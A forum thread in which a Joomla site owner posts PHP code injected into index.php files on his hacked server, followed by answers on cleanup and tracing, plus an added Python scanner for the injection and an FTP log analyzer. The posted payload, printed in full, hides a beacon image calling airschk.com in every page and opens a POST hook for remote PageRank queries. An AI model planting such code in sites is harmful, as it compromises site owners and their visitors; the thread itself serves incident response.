2

Possible Duplicate:
My server's been hacked EMERGENCY

All Joomla! sites hosted on a single server of mine were hacked and had the following code injected into the index.php files throughout many directories.

    <?php
    //{{126104ed

    // Guard so the payload runs at most once per request, even when several
    // infected files are included by the same page load.
    GLOBAL $alreadyxxx;
    if($alreadyxxx != 1)
    {
    $alreadyxxx = 1;

    // Silence PHP errors while the payload runs; restored at the end.
    $olderrxxx=error_reporting(0);

    // Output-buffer callback: inserts a hidden span with a 0x0 tracking image
    // (a beacon to airschk.com) immediately before the page's closing </body> tag.
    function outputxxx_callback($str)
    {
      $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>';
      preg_match("|</body>|si",$str,$arr);
      return str_replace($arr[0],$links.$arr[0],$str);
    }

    // StrToNum / HashURL / CheckHash compute the checksum that the Google Toolbar
    // PageRank query expects ($Str{$i} is the PHP 5-era string offset syntax).
    function StrToNum($Str, $Check, $Magic)
    {
       $Int32Unit = 4294967296;
       $length = strlen($Str);
       for ($i = 0; $i < $length; $i++) {
           $Check *= $Magic;
           if ($Check >= $Int32Unit) {
               $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
               $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
           }
           $Check += ord($Str{$i});
       }
       return $Check;
    }
    function HashURL($String)
    {
       $Check1 = StrToNum($String, 0x1505, 0x21);
       $Check2 = StrToNum($String, 0, 0x1003F);

       $Check1 >>= 2;
       $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
       $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
       $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);

       $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
       $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );

       return ($T1 | $T2);
    }

    function CheckHash($Hashnum)
    {
       $CheckByte = 0;
       $Flag = 0;

       $HashStr = sprintf('%u', $Hashnum) ;
       $length = strlen($HashStr);

       for ($i = $length-1; $i >= 0;  $i--) {
           $Re = $HashStr{$i};
           if (1 === ($Flag % 2)) {
               $Re += $Re;
               $Re = (int)($Re / 10) + ($Re % 10);
           }
           $CheckByte += $Re;
           $Flag ++;
       }

       $CheckByte %= 10;
       if (0 !== $CheckByte) {
           $CheckByte = 10 - $CheckByte;
           if (1 === ($Flag % 2) ) {
               if (1 === ($CheckByte % 2)) {
                   $CheckByte += 9;
               }
               $CheckByte >>= 1;
           }
       }

       return '7'.$CheckByte.$HashStr;
    }

    // Fetches the Google Toolbar PageRank of $url; -1 if the reply carries no "Rank_" field.
    function getpr($url)
    {
       $ch = CheckHash(HashURL($url));
       $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";
       $data = file_get_contents($file);
       $pos = strpos($data, "Rank_");
       if($pos === false){return -1;} else{
           $pr=substr($data, $pos + 9);
           $pr=trim($pr);
           $pr=str_replace("\n",'',$pr);
           return $pr;
       }
    }

    // Remote hook: a POST carrying 'xxxprch' makes the infected page return the
    // PageRank of the supplied URL and stop. Every other request gets the beacon
    // appended through the output buffer.
    if(isset($_POST['xxxprch']))
    {
        echo getpr($_POST['xxxprch']);
        exit();
    }
    else
      ob_start('outputxxx_callback');

    error_reporting($olderrxxx);
    }

    //}}861921ab

As far as I was aware, and according to all the documentation, my Joomla! sites were secure. However, all of them on the same server were hacked at the same time. Is it the host's fault?

Does anyone know where I should begin cleaning this mess up? Any quick solutions apart from my site backups?

And the biggest question I have is what would be the best way to trace the hacker to his/her site, server or location? I really want to show them my appreciation of their work in return.

Andy Smith
  • As to your 'Biggest Question,' you probably can't track the source of the breach, as foreign systems are likely involved, and they won't waste time on small beans. Try not to take the breach personally, though. All that aside, your logs are the place to start, assuming they are unaltered. Also your service provider for the server might have some limited traffic data logged (like IP addresses and date stamps). – JeffG Apr 21 '11 at 21:04
  • Once your system is 'owned,' your backups are your only trustable recourse, but beware - whatever vulnerability led to this breach also exists in your backups. For extra credit, you could set up a honeypot using the backups and capture some data to see how the breach happened (if the attackers re-attack your system after a restore). – JeffG Apr 21 '11 at 21:06
  • @Andy Smith, investigations are better left to professionals... i.e. the FBI. The fact that you need to ask how to start the investigation means you'd likely be in way over your head... and for what good reason? Let the FBI do the work, if they haven't been notified already – Mike Pennington Apr 22 '11 at 02:50
  • Note for future readers: http://stackoverflow.com/questions/7402301/hackers-have-added-content-to-my-php-files/7402388#7402388 – Incognito Sep 13 '11 at 14:09
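The payload above is delimited by a `//{{<hex>` / `//}}<hex>` marker pair, registers an output-buffer callback that slips a hidden beacon image in before `</body>`, and answers a POST carrying `xxxprch` with a PageRank lookup. The script below is an added example, not code from the question, from Joomla or from any answer: it walks a directory tree, flags PHP files that contain the marker pair or the other strings visible in the posted payload, and strips the marker-delimited block so the scope of the infection across sites can be confirmed. The two sample `index.php` files it writes are constructed stand-ins, cut down from the posted code. Pulling the block out is triage, not recovery: a file that was writable by the attacker is not trustworthy after cleaning, and the restore-from-backup advice still applies.

```python
import re
import tempfile
from pathlib import Path

# Marker pair seen in the posted payload: "//{{" + 8 hex chars ... "//}}" + 8 hex chars.
# The opening and closing tags differ (126104ed / 861921ab on the page), so each is
# matched on its own; DOTALL lets the lazy ".*?" span the whole injected block.
INJECT_RE = re.compile(
    r"//\{\{[0-9a-f]{8}[ \t]*\r?\n.*?//\}\}[0-9a-f]{8}[ \t]*(?:\r?\n)*",
    re.DOTALL,
)

# Secondary strings from the posted payload. A hit on one of these without the marker
# pair points at a variant that needs manual inspection rather than automatic cleaning.
INDICATORS = ("$alreadyxxx", "outputxxx_callback", "xxxprch", "airschk.com")


def find_indicators(php_source):
    """Return the payload strings present in a PHP file's text, in INDICATORS order."""
    return [s for s in INDICATORS if s in php_source]


def clean_source(php_source):
    """Remove every marker-delimited block. Returns (cleaned_text, blocks_removed)."""
    return INJECT_RE.subn("", php_source)


def scan_tree(root, pattern="*.php"):
    """Walk root; map each infected file's relative path to its indicators and block count."""
    root = Path(root)
    hits = {}
    for path in root.rglob(pattern):
        text = path.read_text(encoding="utf-8", errors="replace")
        found = find_indicators(text)
        blocks = len(INJECT_RE.findall(text))
        if found or blocks:
            hits[path.relative_to(root).as_posix()] = {"indicators": found, "blocks": blocks}
    return hits


# --- constructed sample tree: a cut-down stand-in for an infected index.php ---
INFECTED_SAMPLE = (
    "<?php\n"
    "//{{126104ed\n"
    "\n"
    "GLOBAL $alreadyxxx;\n"
    "if($alreadyxxx != 1)\n"
    "{\n"
    "$alreadyxxx = 1;\n"
    "ob_start('outputxxx_callback');\n"
    "}\n"
    "\n"
    "//}}861921ab\n"
    "\n"
    "defined('_JEXEC') or die;\n"
)
CLEAN_SAMPLE = "<?php\ndefined('_JEXEC') or die;\n"


def build_demo_tree():
    """Create a temporary tree with one infected and one clean index.php (constructed data)."""
    root = Path(tempfile.mkdtemp(prefix="joomla-scan-"))
    (root / "site1").mkdir()
    (root / "site1" / "index.php").write_text(INFECTED_SAMPLE, encoding="utf-8")
    (root / "site2").mkdir()
    (root / "site2" / "index.php").write_text(CLEAN_SAMPLE, encoding="utf-8")
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for rel, info in scan_tree(demo_root).items():
        print(f"{rel}: {info}")
        cleaned, removed = clean_source((demo_root / rel).read_text(encoding="utf-8"))
        print(f"  removed {removed} block(s); {len(cleaned)} bytes remain")
```

Run it against a copy of the document root rather than the live tree, and keep the list of hits: the set of directories and accounts touched is the first input to the log review, and a file that shows the indicator strings but no marker pair should be read by hand.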

5 Answers

4

"As far I was aware and according to all documentation, my Joomla! sites were secure."

That statement is your first problem. If you google for "joomla hacked" there are 280,000 results just in the past month alone...

As far as recovery, I wouldn't trust anything shy of restoring from a known good backup. Those edits are just the ones you found. Who knows what else might have been put in there.

For tracking them down, you might want to start by reading this: http://kb.siteground.com/article/Joomla_hacked.html

In a nutshell I'd say your chances are close to nil. However, they go up a few percentage points if you happen to have deep pockets or government backing.

NotMe
2

My guess is that they got the password for your server with a Trojan. Check your computer ASAP, especially if you store the server passwords in any program (browser, FTP clients, Total Commander, etc.). BTW: I'm assuming you're using Windows.

About tracing the hacker, it's not going to be easy. First check the access logs from the time this happened. You'll probably see tons of FTP activity there. Have a look at the IPs in those logs. If all of them are different, then he's probably using zombie computers and it's very unlikely that you'll get to him. If they're all the same, then you might be a little luckier.

Anyway, this sounds like an automated attack. Do a search to check if other sites (not on your server) had the same code injected into them.

Cristian
  • I'd like to know who downvoted this answer, and why, considering it was accepted as the right answer. – Cristian Apr 28 '11 at 20:19
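The log review this answer describes, as an added example that is not part of the answer: a parser for FTP transfer logs in xferlog format (the format written by wu-ftpd, proftpd and vsftpd; whether the server in question keeps such a log is an assumption), a filter for uploads of `index.php` in a time window, and a per-source tally that distinguishes the two cases the answer names, one host doing all the writes versus many. It also records which FTP accounts each source used, since one host writing through several accounts is the pattern a stolen password list would leave. The log lines are constructed for the example.

```python
from collections import Counter, defaultdict
from datetime import datetime

# Constructed xferlog lines (hosts, accounts and times are made up). Token layout after the
# five-token timestamp: transfer-time remote-host file-size filename transfer-type
# special-action-flag direction access-mode username service-name auth-method auth-uid status
SAMPLE_XFERLOG = """\
Mon Apr 18 03:12:41 2011 1 203.0.113.5 4213 /var/www/site1/index.php b _ i r site1 ftp 0 * c
Mon Apr 18 03:12:43 2011 1 203.0.113.5 3987 /var/www/site1/administrator/index.php b _ i r site1 ftp 0 * c
Mon Apr 18 03:12:50 2011 1 203.0.113.5 4110 /var/www/site2/index.php b _ i r site2 ftp 0 * c
Mon Apr 18 03:13:02 2011 1 198.51.100.77 4002 /var/www/site3/index.php b _ i r site3 ftp 0 * c
Mon Apr 18 09:40:11 2011 2 192.0.2.10 58213 /var/www/site1/images/logo.png b _ o r site1 ftp 0 * c
Mon Apr 18 09:41:30 2011 1 192.0.2.10 4110 /var/www/site1/index.php b _ o r site1 ftp 0 * c
"""

FIELDS = ("transfer_time", "remote_host", "size", "filename", "type", "special",
          "direction", "access_mode", "username", "service", "auth_method", "auth_uid", "status")


def parse_xferlog(text):
    """Parse xferlog lines into dicts; the first five tokens form the timestamp."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 + len(FIELDS):
            continue  # truncated line: skip it rather than guess at fields
        entry = dict(zip(FIELDS, parts[5:5 + len(FIELDS)]))
        entry["when"] = datetime.strptime(" ".join(parts[:5]), "%a %b %d %H:%M:%S %Y")
        entries.append(entry)
    return entries


def uploads_of(entries, name="index.php", start=None, end=None):
    """Incoming transfers (direction 'i') of files named `name`, optionally limited to [start, end]."""
    out = []
    for e in entries:
        if e["direction"] != "i" or not e["filename"].endswith("/" + name):
            continue
        if start is not None and e["when"] < start:
            continue
        if end is not None and e["when"] > end:
            continue
        out.append(e)
    return out


def summarize(uploads):
    """Uploads per source host, plus the FTP accounts each host authenticated as."""
    per_host = Counter(e["remote_host"] for e in uploads)
    accounts = defaultdict(set)
    for e in uploads:
        accounts[e["remote_host"]].add(e["username"])
    return per_host, {host: sorted(names) for host, names in accounts.items()}


def classify(per_host):
    """The answer's two cases: one host behind every write, or writes spread across hosts."""
    return "single-source" if len(per_host) == 1 else "distributed"


if __name__ == "__main__":
    entries = parse_xferlog(SAMPLE_XFERLOG)
    uploads = uploads_of(entries)
    per_host, accounts = summarize(uploads)
    print(classify(per_host))
    for host, count in per_host.most_common():
        print(f"{host}: {count} index.php upload(s) via accounts {accounts[host]}")
```

Narrow the window to the minutes around the first modified file's mtime before drawing conclusions: in the sample, the whole day reads as "distributed", while the window up to 03:12:50 shows one host writing `index.php` into two different accounts' sites.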
1

You don't give us enough details to be able to help with the how; it was almost certainly an automated attack, and trying to track it down will just waste your time.

There is no quick way to recover from this. Nuke from orbit and restore from a known good backup is the only way to go.

user9517
0

Make sure you keep Joomla up to date! Keep on top of security updates and get them installed on all sites the day they are released.

Alex
0

There is some explanation about it here:

http://sucuri.net/malware/malware-entry-mwbackdoor23

It seems to be a backdoor, and the img src is just used to notify the attackers that the backdoor is there...